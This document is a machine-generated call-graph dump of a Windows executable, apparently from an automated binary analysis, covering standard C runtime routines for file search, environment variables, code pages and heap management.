7ff67a62aa7e 18700->18701 18704 7ff67a615478 LeaveCriticalSection 18701->18704 19839 7ff67a62abf4 19842 7ff67a615478 LeaveCriticalSection 19839->19842 19853 7ff67a61cbe0 19864 7ff67a620db8 EnterCriticalSection 19853->19864 19865 7ff67a61a3e0 19868 7ff67a61a35c 19865->19868 19875 7ff67a620db8 EnterCriticalSection 19868->19875 18280 7ff67a617f4c 18281 7ff67a617f7a 18280->18281 18282 7ff67a617fb3 18280->18282 18284 7ff67a6155c4 _findclose 11 API calls 18281->18284 18282->18281 18283 7ff67a617fb8 FindFirstFileExW 18282->18283 18286 7ff67a617fda GetLastError 18283->18286 18287 7ff67a618021 18283->18287 18285 7ff67a617f7f 18284->18285 18288 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18285->18288 18290 7ff67a618011 18286->18290 18291 7ff67a617fe5 18286->18291 18340 7ff67a6181bc 18287->18340 18292 7ff67a617f8a 18288->18292 18293 7ff67a6155c4 _findclose 11 API calls 18290->18293 18291->18290 18296 7ff67a617fef 18291->18296 18297 7ff67a618001 18291->18297 18299 7ff67a60bdc0 _wfindfirst32i64 8 API calls 18292->18299 18293->18292 18295 7ff67a6181bc _wfindfirst32i64 10 API calls 18300 7ff67a618047 18295->18300 18296->18290 18301 7ff67a617ff4 18296->18301 18298 7ff67a6155c4 _findclose 11 API calls 18297->18298 18298->18292 18302 7ff67a617f9e 18299->18302 18303 7ff67a6181bc _wfindfirst32i64 10 API calls 18300->18303 18304 7ff67a6155c4 _findclose 11 API calls 18301->18304 18305 7ff67a618055 18303->18305 18304->18292 18306 7ff67a620f54 _wfindfirst32i64 37 API calls 18305->18306 18307 7ff67a618073 18306->18307 18307->18292 18308 7ff67a61807f 18307->18308 18309 7ff67a61afc4 _wfindfirst32i64 17 API calls 18308->18309 18310 7ff67a618093 18309->18310 18311 7ff67a6180bd 18310->18311 18314 7ff67a6180fc FindNextFileW 18310->18314 18312 7ff67a6155c4 _findclose 11 API calls 18311->18312 18313 7ff67a6180c2 18312->18313 18315 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18313->18315 18316 7ff67a61810b GetLastError 18314->18316 18317 7ff67a61814c 18314->18317 18321 7ff67a6180cd 18315->18321 18319 7ff67a618116 18316->18319 18320 7ff67a61813f 18316->18320 18318 7ff67a6181bc _wfindfirst32i64 10 API calls 18317->18318 18323 7ff67a618164 18318->18323 18319->18320 18324 7ff67a618120 18319->18324 18325 7ff67a618132 18319->18325 18322 7ff67a6155c4 _findclose 11 API calls 18320->18322 18326 7ff67a60bdc0 _wfindfirst32i64 8 API calls 18321->18326 18322->18321 18327 7ff67a6181bc _wfindfirst32i64 10 API calls 18323->18327 18324->18320 18328 7ff67a618125 18324->18328 18329 7ff67a6155c4 _findclose 11 API calls 18325->18329 18330 7ff67a6180e0 18326->18330 18331 7ff67a618172 18327->18331 18332 7ff67a6155c4 _findclose 11 API calls 18328->18332 18329->18321 18333 7ff67a6181bc _wfindfirst32i64 10 API calls 18331->18333 18332->18321 18334 7ff67a618180 18333->18334 18335 7ff67a620f54 _wfindfirst32i64 37 API calls 18334->18335 18336 7ff67a61819e 18335->18336 18336->18321 18337 7ff67a6181a6 18336->18337 18338 7ff67a61afc4 _wfindfirst32i64 17 API calls 18337->18338 18339 7ff67a6181ba 18338->18339 18341 7ff67a6181da FileTimeToSystemTime 18340->18341 18342 7ff67a6181d4 18340->18342 18343 7ff67a6181e9 SystemTimeToTzSpecificLocalTime 18341->18343 18345 7ff67a6181ff 18341->18345 18342->18341 18342->18345 18343->18345 18344 7ff67a60bdc0 _wfindfirst32i64 8 API calls 18346 7ff67a618039 18344->18346 18345->18344 18346->18295 18792 7ff67a621038 18793 7ff67a62105c 18792->18793 18797 7ff67a62106c 18792->18797 18794 7ff67a6155c4 _findclose 11 API calls 18793->18794 18795 7ff67a621061 18794->18795 18796 7ff67a62134c 18798 7ff67a6155c4 _findclose 11 API calls 18796->18798 18797->18796 18799 7ff67a62108e 18797->18799 18800 7ff67a621351 18798->18800 18801 7ff67a6210af 18799->18801 18923 7ff67a6216f4 18799->18923 18803 7ff67a61b00c __free_lconv_num 11 API calls 18800->18803 18804 7ff67a621121 18801->18804 18805 7ff67a6210d5 18801->18805 18817 7ff67a621115 18801->18817 18803->18795 18807 7ff67a61f258 _findclose 11 API calls 18804->18807 18820 7ff67a6210e4 18804->18820 18938 7ff67a619d50 18805->18938 18809 7ff67a621137 18807->18809 18813 7ff67a61b00c __free_lconv_num 11 API calls 18809->18813 18811 7ff67a6211ce 18816 7ff67a6211eb 18811->18816 18823 7ff67a62123d 18811->18823 18812 7ff67a61b00c __free_lconv_num 11 API calls 18812->18795 18818 7ff67a621145 18813->18818 18814 7ff67a6210fd 18814->18817 18822 7ff67a6216f4 45 API calls 18814->18822 18815 7ff67a6210df 18819 7ff67a6155c4 _findclose 11 API calls 18815->18819 18821 7ff67a61b00c __free_lconv_num 11 API calls 18816->18821 18817->18811 18817->18820 18944 7ff67a627afc 18817->18944 18818->18817 18818->18820 18826 7ff67a61f258 _findclose 11 API calls 18818->18826 18819->18820 18820->18812 18824 7ff67a6211f4 18821->18824 18822->18817 18823->18820 18825 7ff67a623b4c 40 API calls 18823->18825 18832 7ff67a6211f9 18824->18832 18980 7ff67a623b4c 18824->18980 18827 7ff67a62127a 18825->18827 18830 7ff67a621167 18826->18830 18828 7ff67a61b00c __free_lconv_num 11 API calls 18827->18828 18831 7ff67a621284 18828->18831 18835 7ff67a61b00c __free_lconv_num 11 API calls 18830->18835 18831->18820 18831->18832 18833 7ff67a621340 18832->18833 18838 7ff67a61f258 _findclose 11 API calls 18832->18838 18837 7ff67a61b00c __free_lconv_num 11 API calls 18833->18837 18834 7ff67a621225 18836 7ff67a61b00c __free_lconv_num 11 API calls 18834->18836 18835->18817 18836->18832 18837->18795 18839 7ff67a6212c8 18838->18839 18840 7ff67a6212d9 18839->18840 18841 7ff67a6212d0 18839->18841 18843 7ff67a61ab3c __std_exception_copy 37 API calls 18840->18843 18842 7ff67a61b00c __free_lconv_num 11 API calls 18841->18842 18844 7ff67a6212d7 18842->18844 18845 7ff67a6212e8 18843->18845 18850 7ff67a61b00c __free_lconv_num 11 API calls 18844->18850 18846 7ff67a62137b 18845->18846 18847 7ff67a6212f0 18845->18847 18849 7ff67a61afc4 _wfindfirst32i64 17 API calls 18846->18849 18989 7ff67a627c14 18847->18989 18852 7ff67a62138f 18849->18852 18850->18795 18855 7ff67a6213b8 18852->18855 18862 7ff67a6213c8 18852->18862 18853 7ff67a621317 18856 7ff67a6155c4 _findclose 11 API calls 18853->18856 18854 7ff67a621338 18858 7ff67a61b00c __free_lconv_num 11 API calls 18854->18858 18857 7ff67a6155c4 _findclose 11 API calls 18855->18857 18859 7ff67a62131c 18856->18859 18880 7ff67a6213bd 18857->18880 18858->18833 18860 7ff67a61b00c __free_lconv_num 11 API calls 18859->18860 18860->18844 18861 7ff67a6216ab 18864 7ff67a6155c4 _findclose 11 API calls 18861->18864 18862->18861 18863 7ff67a6213ea 18862->18863 18865 7ff67a621407 18863->18865 19008 7ff67a6217dc 18863->19008 18866 7ff67a6216b0 18864->18866 18869 7ff67a62147b 18865->18869 18871 7ff67a62142f 18865->18871 18875 7ff67a62146f 18865->18875 18868 7ff67a61b00c __free_lconv_num 11 API calls 18866->18868 18868->18880 18873 7ff67a6214a3 18869->18873 18876 7ff67a61f258 _findclose 11 API calls 18869->18876 18892 7ff67a62143e 18869->18892 18870 7ff67a62152e 18885 7ff67a62154b 18870->18885 18893 7ff67a62159e 18870->18893 19023 7ff67a619d8c 18871->19023 18873->18875 18878 7ff67a61f258 _findclose 11 API calls 18873->18878 18873->18892 18875->18870 18875->18892 19029 7ff67a6279bc 18875->19029 18881 7ff67a621495 18876->18881 18884 7ff67a6214c5 18878->18884 18879 7ff67a61b00c __free_lconv_num 11 API calls 18879->18880 18888 7ff67a61b00c __free_lconv_num 11 API calls 18881->18888 18882 7ff67a621457 18882->18875 18891 7ff67a6217dc 45 API calls 18882->18891 18883 7ff67a621439 18889 7ff67a6155c4 _findclose 11 API calls 18883->18889 18886 7ff67a61b00c __free_lconv_num 11 API calls 18884->18886 18887 7ff67a61b00c __free_lconv_num 11 API calls 18885->18887 18886->18875 18890 7ff67a621554 18887->18890 18888->18873 18889->18892 18897 7ff67a623b4c 40 API calls 18890->18897 18899 7ff67a62155a 18890->18899 18891->18875 18892->18879 18893->18892 18894 7ff67a623b4c 40 API calls 18893->18894 18895 7ff67a6215dc 18894->18895 18896 7ff67a61b00c __free_lconv_num 11 API calls 18895->18896 18898 7ff67a6215e6 18896->18898 18901 7ff67a621586 18897->18901 18898->18892 18898->18899 18900 7ff67a62169f 18899->18900 18904 7ff67a61f258 _findclose 11 API calls 18899->18904 18903 7ff67a61b00c __free_lconv_num 11 API calls 18900->18903 18902 7ff67a61b00c __free_lconv_num 11 API calls 18901->18902 18902->18899 18903->18880 18905 7ff67a62162b 18904->18905 18906 7ff67a62163c 18905->18906 18907 7ff67a621633 18905->18907 18908 7ff67a620f54 _wfindfirst32i64 37 API calls 18906->18908 18909 7ff67a61b00c __free_lconv_num 11 API calls 18907->18909 18910 7ff67a62164a 18908->18910 18911 7ff67a62163a 18909->18911 18912 7ff67a6216df 18910->18912 18913 7ff67a621652 SetEnvironmentVariableW 18910->18913 18917 7ff67a61b00c __free_lconv_num 11 API calls 18911->18917 18916 7ff67a61afc4 _wfindfirst32i64 17 API calls 18912->18916 18914 7ff67a621697 18913->18914 18915 7ff67a621676 18913->18915 18920 7ff67a61b00c __free_lconv_num 11 API calls 18914->18920 18918 7ff67a6155c4 _findclose 11 API calls 18915->18918 18919 7ff67a6216f3 18916->18919 18917->18880 18921 7ff67a62167b 18918->18921 18920->18900 18922 7ff67a61b00c __free_lconv_num 11 API calls 18921->18922 18922->18911 18924 7ff67a621729 18923->18924 18931 7ff67a621711 18923->18931 18925 7ff67a61f258 _findclose 11 API calls 18924->18925 18926 7ff67a62174d 18925->18926 18927 7ff67a6217ae 18926->18927 18932 7ff67a61f258 _findclose 11 API calls 18926->18932 18933 7ff67a61b00c __free_lconv_num 11 API calls 18926->18933 18934 7ff67a61ab3c __std_exception_copy 37 API calls 18926->18934 18935 7ff67a6217bd 18926->18935 18937 7ff67a6217d2 18926->18937 18930 7ff67a61b00c __free_lconv_num 11 API calls 18927->18930 18928 7ff67a61ab9c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18929 7ff67a6217d8 18928->18929 18930->18931 18931->18801 18932->18926 18933->18926 18934->18926 18936 7ff67a61afc4 _wfindfirst32i64 17 API calls 18935->18936 18936->18937 18937->18928 18939 7ff67a619d60 18938->18939 18943 7ff67a619d69 18938->18943 18939->18943 19053 7ff67a619828 18939->19053 18943->18814 18943->18815 18945 7ff67a627b09 18944->18945 18946 7ff67a626cac 18944->18946 18948 7ff67a615098 45 API calls 18945->18948 18947 7ff67a626cb9 18946->18947 18955 7ff67a626cef 18946->18955 18950 7ff67a6155c4 _findclose 11 API calls 18947->18950 18954 7ff67a626c60 18947->18954 18949 7ff67a627b3d 18948->18949 18956 7ff67a627b53 18949->18956 18959 7ff67a627b6a 18949->18959 18975 7ff67a627b42 18949->18975 18952 7ff67a626cc3 18950->18952 18951 7ff67a626d19 18953 7ff67a6155c4 _findclose 11 API calls 18951->18953 18957 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18952->18957 18958 7ff67a626d1e 18953->18958 18954->18817 18955->18951 18963 7ff67a626d3e 18955->18963 18960 7ff67a6155c4 _findclose 11 API calls 18956->18960 18961 7ff67a626cce 18957->18961 18962 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18958->18962 18966 7ff67a627b86 18959->18966 18967 7ff67a627b74 18959->18967 18965 7ff67a627b58 18960->18965 18961->18817 18970 7ff67a626d29 18962->18970 18964 7ff67a615098 45 API calls 18963->18964 18963->18970 18964->18970 18971 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18965->18971 18968 7ff67a627b97 18966->18968 18969 7ff67a627bae 18966->18969 18972 7ff67a6155c4 _findclose 11 API calls 18967->18972 19276 7ff67a626cfc 18968->19276 19285 7ff67a629924 18969->19285 18970->18817 18971->18975 18976 7ff67a627b79 18972->18976 18975->18817 18978 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18976->18978 18978->18975 18979 7ff67a6155c4 _findclose 11 API calls 18979->18975 18981 7ff67a623b8b 18980->18981 18982 7ff67a623b6e 18980->18982 18984 7ff67a623b95 18981->18984 19325 7ff67a628608 18981->19325 18982->18981 18983 7ff67a623b7c 18982->18983 18985 7ff67a6155c4 _findclose 11 API calls 18983->18985 19332 7ff67a620fbc 18984->19332 18988 7ff67a623b81 __scrt_get_show_window_mode 18985->18988 18988->18834 18990 7ff67a615098 45 API calls 18989->18990 18991 7ff67a627c7a 18990->18991 18992 7ff67a627c88 18991->18992 18993 7ff67a61f4e4 5 API calls 18991->18993 18994 7ff67a615684 14 API calls 18992->18994 18993->18992 18995 7ff67a627ce4 18994->18995 18996 7ff67a627d74 18995->18996 18997 7ff67a615098 45 API calls 18995->18997 18999 7ff67a627d85 18996->18999 19000 7ff67a61b00c __free_lconv_num 11 API calls 18996->19000 18998 7ff67a627cf7 18997->18998 19002 7ff67a61f4e4 5 API calls 18998->19002 19005 7ff67a627d00 18998->19005 19001 7ff67a621313 18999->19001 19003 7ff67a61b00c __free_lconv_num 11 API calls 18999->19003 19000->18999 19001->18853 19001->18854 19002->19005 19003->19001 19004 7ff67a615684 14 API calls 19006 7ff67a627d5b 19004->19006 19005->19004 19006->18996 19007 7ff67a627d63 SetEnvironmentVariableW 19006->19007 19007->18996 19009 7ff67a62181c 19008->19009 19010 7ff67a6217ff 19008->19010 19011 7ff67a61f258 _findclose 11 API calls 19009->19011 19010->18865 19012 7ff67a621840 19011->19012 19013 7ff67a6218a1 19012->19013 19017 7ff67a61f258 _findclose 11 API calls 19012->19017 19018 7ff67a61b00c __free_lconv_num 11 API calls 19012->19018 19019 7ff67a620f54 _wfindfirst32i64 37 API calls 19012->19019 19020 7ff67a6218b0 19012->19020 19022 7ff67a6218c4 19012->19022 19015 7ff67a61b00c __free_lconv_num 11 API calls 19013->19015 19014 7ff67a61ab9c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19016 7ff67a6218ca 19014->19016 19015->19010 19017->19012 19018->19012 19019->19012 19021 7ff67a61afc4 _wfindfirst32i64 17 API calls 19020->19021 19021->19022 19022->19014 19024 7ff67a619d9c 19023->19024 19025 7ff67a619da5 19023->19025 19024->19025 19344 7ff67a61989c 19024->19344 19025->18882 19025->18883 19030 7ff67a6279c9 19029->19030 19034 7ff67a6279f6 19029->19034 19031 7ff67a6279ce 19030->19031 19030->19034 19032 7ff67a6155c4 _findclose 11 API calls 19031->19032 19035 7ff67a6279d3 19032->19035 19033 7ff67a627a3a 19036 7ff67a6155c4 _findclose 11 API calls 19033->19036 19034->19033 19037 7ff67a627a59 19034->19037 19051 7ff67a627a2e __crtLCMapStringW 19034->19051 19038 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 19035->19038 19039 7ff67a627a3f 19036->19039 19040 7ff67a627a63 19037->19040 19041 7ff67a627a75 19037->19041 19042 7ff67a6279de 19038->19042 19044 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 19039->19044 19045 7ff67a6155c4 _findclose 11 API calls 19040->19045 19043 7ff67a615098 45 API calls 19041->19043 19042->18875 19046 7ff67a627a82 19043->19046 19044->19051 19047 7ff67a627a68 19045->19047 19046->19051 19391 7ff67a6294e0 19046->19391 19048 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 19047->19048 19048->19051 19051->18875 19052 7ff67a6155c4 _findclose 11 API calls 19052->19051 19054 7ff67a619841 19053->19054 19063 7ff67a61983d 19053->19063 19076 7ff67a622d60 19054->19076 19059 7ff67a61985f 19102 7ff67a61990c 19059->19102 19060 7ff67a619853 19061 7ff67a61b00c __free_lconv_num 11 API calls 19060->19061 19061->19063 19063->18943 19068 7ff67a619b7c 19063->19068 19065 7ff67a61b00c __free_lconv_num 11 API calls 19066 7ff67a619886 19065->19066 19067 7ff67a61b00c __free_lconv_num 11 API calls 19066->19067 19067->19063 19069 7ff67a619ba5 19068->19069 19070 7ff67a619bbe 19068->19070 19069->18943 19070->19069 19071 7ff67a61f258 _findclose 11 API calls 19070->19071 19072 7ff67a619c4e 19070->19072 19073 7ff67a6205c8 WideCharToMultiByte 19070->19073 19075 7ff67a61b00c __free_lconv_num 11 API calls 19070->19075 19071->19070 19074 7ff67a61b00c __free_lconv_num 11 API calls 19072->19074 19073->19070 19074->19069 19075->19070 19077 7ff67a619846 19076->19077 19078 7ff67a622d6d 19076->19078 19082 7ff67a62309c GetEnvironmentStringsW 19077->19082 19121 7ff67a61b8e4 19078->19121 19083 7ff67a61984b 19082->19083 19084 7ff67a6230cc 19082->19084 19083->19059 19083->19060 19085 7ff67a6205c8 WideCharToMultiByte 19084->19085 19086 7ff67a62311d 19085->19086 19087 7ff67a623124 FreeEnvironmentStringsW 19086->19087 19088 7ff67a61dcbc _fread_nolock 12 API calls 19086->19088 19087->19083 19089 7ff67a623137 19088->19089 19090 7ff67a623148 19089->19090 19091 7ff67a62313f 19089->19091 19093 7ff67a6205c8 WideCharToMultiByte 19090->19093 19092 7ff67a61b00c __free_lconv_num 11 API calls 19091->19092 19094 7ff67a623146 19092->19094 19095 7ff67a62316b 19093->19095 19094->19087 19096 7ff67a623179 19095->19096 19097 7ff67a62316f 19095->19097 19099 7ff67a61b00c __free_lconv_num 11 API calls 19096->19099 19098 7ff67a61b00c __free_lconv_num 11 API calls 19097->19098 19100 7ff67a623177 FreeEnvironmentStringsW 19098->19100 19099->19100 19100->19083 19103 7ff67a619931 19102->19103 19104 7ff67a61f258 _findclose 11 API calls 19103->19104 19105 7ff67a619967 19104->19105 19108 7ff67a6199e2 19105->19108 19110 7ff67a61f258 _findclose 11 API calls 19105->19110 19111 7ff67a6199d1 19105->19111 19113 7ff67a61ab3c __std_exception_copy 37 API calls 19105->19113 19116 7ff67a619a07 19105->19116 19117 7ff67a61996f 19105->19117 19119 7ff67a61b00c __free_lconv_num 11 API calls 19105->19119 19106 7ff67a61b00c __free_lconv_num 11 API calls 19107 7ff67a619867 19106->19107 19107->19065 19109 7ff67a61b00c __free_lconv_num 11 API calls 19108->19109 19109->19107 19110->19105 19270 7ff67a619b38 19111->19270 19113->19105 19115 7ff67a61b00c __free_lconv_num 11 API calls 19115->19117 19118 7ff67a61afc4 _wfindfirst32i64 17 API calls 19116->19118 19117->19106 19120 7ff67a619a1a 19118->19120 19119->19105 19122 7ff67a61b910 FlsSetValue 19121->19122 19123 7ff67a61b8f5 FlsGetValue 19121->19123 19125 7ff67a61b902 19122->19125 19126 7ff67a61b91d 19122->19126 19124 7ff67a61b90a 19123->19124 19123->19125 19124->19122 19127 7ff67a61b908 19125->19127 19128 7ff67a61ab9c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19125->19128 19129 7ff67a61f258 _findclose 11 API calls 19126->19129 19141 7ff67a622a34 19127->19141 19130 7ff67a61b985 19128->19130 19131 7ff67a61b92c 19129->19131 19132 7ff67a61b94a FlsSetValue 19131->19132 19133 7ff67a61b93a FlsSetValue 19131->19133 19135 7ff67a61b956 FlsSetValue 19132->19135 19136 7ff67a61b968 19132->19136 19134 7ff67a61b943 19133->19134 19138 7ff67a61b00c __free_lconv_num 11 API calls 19134->19138 19135->19134 19137 7ff67a61b5b8 _findclose 11 API calls 19136->19137 19139 7ff67a61b970 19137->19139 19138->19125 19140 7ff67a61b00c __free_lconv_num 11 API calls 19139->19140 19140->19127 19164 7ff67a622ca4 19141->19164 19143 7ff67a622a69 19179 7ff67a622734 19143->19179 19146 7ff67a61dcbc _fread_nolock 12 API calls 19147 7ff67a622a97 19146->19147 19148 7ff67a622a9f 19147->19148 19151 7ff67a622aae 19147->19151 19149 7ff67a61b00c __free_lconv_num 11 API calls 19148->19149 19150 7ff67a622a86 19149->19150 19150->19077 19186 7ff67a622ddc 19151->19186 19154 7ff67a622baa 19155 7ff67a6155c4 _findclose 11 API calls 19154->19155 19156 7ff67a622baf 19155->19156 19160 7ff67a61b00c __free_lconv_num 11 API calls 19156->19160 19157 7ff67a622c05 19159 7ff67a622c6c 19157->19159 19197 7ff67a622564 19157->19197 19158 7ff67a622bc4 19158->19157 19161 7ff67a61b00c __free_lconv_num 11 API calls 19158->19161 19163 7ff67a61b00c __free_lconv_num 11 API calls 19159->19163 19160->19150 19161->19157 19163->19150 19165 7ff67a622cc7 19164->19165 19166 7ff67a622cd1 19165->19166 19212 7ff67a620db8 EnterCriticalSection 19165->19212 19168 7ff67a622d43 19166->19168 19170 7ff67a61ab9c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19166->19170 19168->19143 19173 7ff67a622d5b 19170->19173 19175 7ff67a61b8e4 50 API calls 19173->19175 19178 7ff67a622db2 19173->19178 19176 7ff67a622d9c 19175->19176 19177 7ff67a622a34 65 API calls 19176->19177 19177->19178 19178->19143 19180 7ff67a615098 45 API calls 19179->19180 19181 7ff67a622748 19180->19181 19182 7ff67a622766 19181->19182 19183 7ff67a622754 GetOEMCP 19181->19183 19184 7ff67a62277b 19182->19184 19185 7ff67a62276b GetACP 19182->19185 19183->19184 19184->19146 19184->19150 19185->19184 19187 7ff67a622734 47 API calls 19186->19187 19188 7ff67a622e09 19187->19188 19189 7ff67a622f5f 19188->19189 19190 7ff67a622e46 IsValidCodePage 19188->19190 19196 7ff67a622e60 __scrt_get_show_window_mode 19188->19196 19191 7ff67a60bdc0 _wfindfirst32i64 8 API calls 19189->19191 19190->19189 19192 7ff67a622e57 19190->19192 19193 7ff67a622ba1 19191->19193 19194 7ff67a622e86 GetCPInfo 19192->19194 19192->19196 19193->19154 19193->19158 19194->19189 19194->19196 19213 7ff67a62284c 19196->19213 19269 7ff67a620db8 EnterCriticalSection 19197->19269 19214 7ff67a622889 GetCPInfo 19213->19214 19215 7ff67a62297f 19213->19215 19214->19215 19220 7ff67a62289c 19214->19220 19216 7ff67a60bdc0 _wfindfirst32i64 8 API calls 19215->19216 19218 7ff67a622a1e 19216->19218 19217 7ff67a6235b0 48 API calls 19219 7ff67a622913 19217->19219 19218->19189 19224 7ff67a628554 19219->19224 19220->19217 19223 7ff67a628554 54 API calls 19223->19215 19225 7ff67a615098 45 API calls 19224->19225 19226 7ff67a628579 19225->19226 19229 7ff67a628220 19226->19229 19230 7ff67a628261 19229->19230 19231 7ff67a61fd00 _fread_nolock MultiByteToWideChar 19230->19231 19236 7ff67a6282ab 19231->19236 19232 7ff67a628529 19233 7ff67a60bdc0 _wfindfirst32i64 8 API calls 19232->19233 19235 7ff67a622946 19233->19235 19234 7ff67a6283e1 19234->19232 19239 7ff67a61b00c __free_lconv_num 11 API calls 19234->19239 19235->19223 19236->19232 19236->19234 19237 7ff67a61dcbc _fread_nolock 12 API calls 19236->19237 19238 7ff67a6282e3 19236->19238 19237->19238 19238->19234 19240 7ff67a61fd00 _fread_nolock MultiByteToWideChar 19238->19240 19239->19232 19241 7ff67a628356 19240->19241 19241->19234 19260 7ff67a61f6a4 19241->19260 19244 7ff67a6283a1 19244->19234 19247 7ff67a61f6a4 __crtLCMapStringW 6 API calls 19244->19247 19245 7ff67a6283f2 19246 7ff67a61dcbc _fread_nolock 12 API calls 19245->19246 19248 7ff67a6284c4 19245->19248 19250 7ff67a628410 19245->19250 19246->19250 19247->19234 19248->19234 19249 7ff67a61b00c __free_lconv_num 11 API calls 19248->19249 19249->19234 19250->19234 19251 7ff67a61f6a4 __crtLCMapStringW 6 API calls 19250->19251 19252 7ff67a628490 19251->19252 19252->19248 19253 7ff67a6284c6 19252->19253 19254 7ff67a6284b0 19252->19254 19256 7ff67a6205c8 WideCharToMultiByte 19253->19256 19255 7ff67a6205c8 WideCharToMultiByte 19254->19255 19257 7ff67a6284be 19255->19257 19256->19257 19257->19248 19258 7ff67a6284de 19257->19258 19258->19234 19259 7ff67a61b00c __free_lconv_num 11 API calls 19258->19259 19259->19234 19261 7ff67a61f2d0 __crtLCMapStringW 5 API calls 19260->19261 19262 7ff67a61f6e2 19261->19262 19263 7ff67a61f6ea 19262->19263 19266 7ff67a61f790 19262->19266 19263->19234 19263->19244 19263->19245 19265 7ff67a61f753 LCMapStringW 19265->19263 19267 7ff67a61f2d0 __crtLCMapStringW 5 API calls 19266->19267 19268 7ff67a61f7be __crtLCMapStringW 19267->19268 19268->19265 19271 7ff67a619b3d 19270->19271 19275 7ff67a6199d9 19270->19275 19272 7ff67a619b66 19271->19272 19273 7ff67a61b00c __free_lconv_num 11 API calls 19271->19273 19274 7ff67a61b00c __free_lconv_num 11 API calls 19272->19274 19273->19271 19274->19275 19275->19115 19277 7ff67a626d19 19276->19277 19278 7ff67a626d30 19276->19278 19279 7ff67a6155c4 _findclose 11 API calls 19277->19279 19278->19277 19281 7ff67a626d3e 19278->19281 19280 7ff67a626d1e 19279->19280 19282 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 19280->19282 19283 7ff67a615098 45 API calls 19281->19283 19284 7ff67a626d29 19281->19284 19282->19284 19283->19284 19284->18975 19286 7ff67a615098 45 API calls 19285->19286 19287 7ff67a629949 19286->19287 19290 7ff67a6295a0 19287->19290 19292 7ff67a6295ee 19290->19292 19291 7ff67a60bdc0 _wfindfirst32i64 8 API calls 19293 7ff67a627bd5 19291->19293 19294 7ff67a629675 19292->19294 19296 7ff67a629660 GetCPInfo 19292->19296 19297 7ff67a629679 19292->19297 19293->18975 19293->18979 19295 7ff67a61fd00 _fread_nolock MultiByteToWideChar 19294->19295 19294->19297 19298 7ff67a62970d 19295->19298 19296->19294 19296->19297 19297->19291 19298->19297 19299 7ff67a61dcbc _fread_nolock 12 API calls 19298->19299 19300 7ff67a629744 19298->19300 19299->19300 19300->19297 19301 7ff67a61fd00 _fread_nolock MultiByteToWideChar 19300->19301 19302 7ff67a6297b2 19301->19302 19303 7ff67a629894 19302->19303 19304 7ff67a61fd00 _fread_nolock MultiByteToWideChar 19302->19304 19303->19297 19305 7ff67a61b00c __free_lconv_num 11 API calls 19303->19305 19306 7ff67a6297d8 19304->19306 19305->19297 19306->19303 19307 7ff67a61dcbc _fread_nolock 12 API calls 19306->19307 19308 7ff67a629805 19306->19308 19307->19308 19308->19303 19309 7ff67a61fd00 _fread_nolock MultiByteToWideChar 19308->19309 19310 7ff67a62987c 19309->19310 19311 7ff67a62989c 19310->19311 19312 7ff67a629882 19310->19312 19319 7ff67a61f528 19311->19319 19312->19303 19314 7ff67a61b00c __free_lconv_num 11 API calls 19312->19314 19314->19303 19316 7ff67a6298db 19316->19297 19318 7ff67a61b00c __free_lconv_num 11 API calls 19316->19318 19317 7ff67a61b00c __free_lconv_num 11 API calls 19317->19316 19318->19297 19320 7ff67a61f2d0 __crtLCMapStringW 5 API calls 19319->19320 19321 7ff67a61f566 19320->19321 19322 7ff67a61f56e 19321->19322 19323 7ff67a61f790 __crtLCMapStringW 5 API calls 19321->19323 19322->19316 19322->19317 19324 7ff67a61f5d7 CompareStringW 19323->19324 19324->19322 19326 7ff67a62862a HeapSize 19325->19326 19327 7ff67a628611 19325->19327 19328 7ff67a6155c4 _findclose 11 API calls 19327->19328 19329 7ff67a628616 19328->19329 19330 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 19329->19330 19331 7ff67a628621 19330->19331 19331->18984 19333 7ff67a620fdb 19332->19333 19334 7ff67a620fd1 19332->19334 19336 7ff67a620fe0 19333->19336 19342 7ff67a620fe7 _findclose 19333->19342 19335 7ff67a61dcbc _fread_nolock 12 API calls 19334->19335 19340 7ff67a620fd9 19335->19340 19337 7ff67a61b00c __free_lconv_num 11 API calls 19336->19337 19337->19340 19338 7ff67a62101a HeapReAlloc 19338->19340 19338->19342 19339 7ff67a620fed 19341 7ff67a6155c4 _findclose 11 API calls 19339->19341 19340->18988 19341->19340 19342->19338 19342->19339 19343 7ff67a623d00 _findclose 2 API calls 19342->19343 19343->19342 19345 7ff67a6198b1 19344->19345 19346 7ff67a6198b5 19344->19346 19345->19025 19357 7ff67a619c5c 19345->19357 19365 7ff67a6231ac GetEnvironmentStringsW 19346->19365 19349 7ff67a6198ce 19372 7ff67a619a1c 19349->19372 19350 7ff67a6198c2 19351 7ff67a61b00c __free_lconv_num 11 API calls 19350->19351 19351->19345 19354 7ff67a61b00c __free_lconv_num 11 API calls 19355 7ff67a6198f5 19354->19355 19356 7ff67a61b00c __free_lconv_num 11 API calls 19355->19356 19356->19345 19358 7ff67a619c7f 19357->19358 19359 7ff67a619c96 19357->19359 19358->19025 19359->19358 19360 7ff67a61f258 _findclose 11 API calls 19359->19360 19361 7ff67a619d0a 19359->19361 19362 7ff67a61fd00 MultiByteToWideChar _fread_nolock 19359->19362 19364 7ff67a61b00c __free_lconv_num 11 API calls 19359->19364 19360->19359 19363 7ff67a61b00c __free_lconv_num 11 API calls 19361->19363 19362->19359 19363->19358 19364->19359 19366 7ff67a6231d0 19365->19366 19367 7ff67a6198ba 19365->19367 19368 7ff67a61dcbc _fread_nolock 12 API calls 19366->19368 19367->19349 19367->19350 19369 7ff67a623207 memcpy_s 19368->19369 19370 7ff67a61b00c __free_lconv_num 11 API calls 19369->19370 19371 7ff67a623227 FreeEnvironmentStringsW 19370->19371 19371->19367 19373 7ff67a619a44 19372->19373 19374 7ff67a61f258 _findclose 11 API calls 19373->19374 19385 7ff67a619a7f 19374->19385 19375 7ff67a619a87 19376 7ff67a61b00c __free_lconv_num 11 API calls 19375->19376 19377 7ff67a6198d6 19376->19377 19377->19354 19378 7ff67a619b01 19379 7ff67a61b00c 